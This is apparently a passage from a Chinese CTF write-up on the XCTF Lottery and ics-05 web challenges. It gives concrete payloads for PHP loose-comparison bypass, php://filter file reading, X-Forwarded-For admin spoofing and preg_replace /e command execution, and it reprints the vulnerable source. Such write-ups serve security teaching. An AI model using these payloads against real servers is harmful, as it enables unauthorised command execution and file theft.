攻防世界 Web 实战：弱类型绕过与文件包含漏洞分析

回到 BP 抓包界面，拦截响应包并修改 numbers 字段为 [true,true,true,true,true,true,true]。

利用 PHP 的弱类型特性，true 会被视为 1，从而匹配所有数字，成功获得奖金。

最终成功拿到 flag。

二、ics-05

打开题目页面，发现只有特定链接可访问，且页面内容似乎为空。

查看页面源代码，发现一个隐藏的 href 链接。

点击后进入新页面，看起来没什么特别的。

尝试修改 URL 参数为 index.php，页面回显 Ok。这说明我们可以读取该文件，如果能读取到 index.php 源码，应该就能找到 flag。

使用伪协议读取文件：

php://filter/read=convert.base64-encode/resource=index.php

复制返回的 Base64 字符串进行解密。

观察解密后的代码，发现如果 IP 为 127.0.0.1 则判定为 admin。此外还有一个 preg_replace 方法，当 pattern 第一个参数的结尾包含 /e 修正符时，第二个参数会被当作 PHP 代码执行。

打开 BP，修改 IP 头为 127.0.0.1 伪装成管理员。

添加三个参数构造命令执行：

?pat=/heihei/e&rep=system('find+-name+ *flag ')&sub=heihei

注意需要使用 + 置换空格，目的是找到 flag.php。

成功找到 flag 文件路径，但 flag 不在页面渲染中显示。

再次构造请求读取文件内容：

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

成功拿到 flag。

解密后的 index.php 代码：

<?php error_reporting(0); @session_start(); posix_setuid(1000); ?> 
<!DOCTYPE HTML> 
<html> 
<head> 
<meta charset="utf-8"> 
<meta name="renderer" content="webkit"> 
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> 
<link rel="stylesheet" href="layui/css/layui.css" media="all"> 
<title>设备维护中心</title> 
<meta charset="utf-8"> 
</head> 
<body> 
<ul> 
<li><a href="?page=index">云平台设备维护中心</a></li> 
</ul> 
<fieldset> 
<legend>设备列表</legend> 
</fieldset> 
<table></table> 
<script type="text/html"> <!-- 这里的 checked 的状态只是演示 --> 
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开 | 关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}> 
</script> 
<script src="layui/layui.js" charset="utf-8"></script> 
<script> layui.use('table', function() { var table = layui.table, form = layui.form; table.render({ elem: '#test', url: '/somrthing.json', cellMinWidth: 80, cols: [ [ { type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true } ] ], page: true }); }); </script> 
<script> layui.use('element', function() { var element = layui.element; //导航的 hover 效果、二级菜单等功能，需要依赖 element 模块 //监听导航点击 element.on('nav(demo)', function(elem) { //console.log(elem) layer.msg(elem.text()); }); }); </script> 
<?php $page = $_GET[page]; if (isset($page)) { if (ctype_alnum($page)) { ?> <br /><br /><br /><br /> <div> <p><?php echo $page; die();?></p> <br /><br /><br /><br /> <?php }else{ ?> <br /><br /><br /><br /> <div> <p> <?php if (strpos($page, 'input') > 0) { die(); } if (strpos($page, 'ta:text') > 0) { die(); } if (strpos($page, 'text') > 0) { die(); } if ($page === 'index.php') { die('Ok'); } include($page); die(); ?> </p> <br /><br /><br /><br /> <?php }} //方便的实现输入输出的功能，正在开发中的功能，只能内部人员测试 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br >Welcome My Admin ! <br >"; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?> 
</body> 
</html>

三、总结

针对 Lottery 和 ics-05 两道题目，分别演示了 PHP 弱类型绕过验证及伪协议结合正则替换执行命令的利用过程。Lottery 题通过 == 比较符的特性，将布尔值传入数组实现全匹配；ics-05 题则利用文件包含配合 preg_replace 的 /e 修饰符，在满足特定 IP 条件下执行系统命令获取 flag。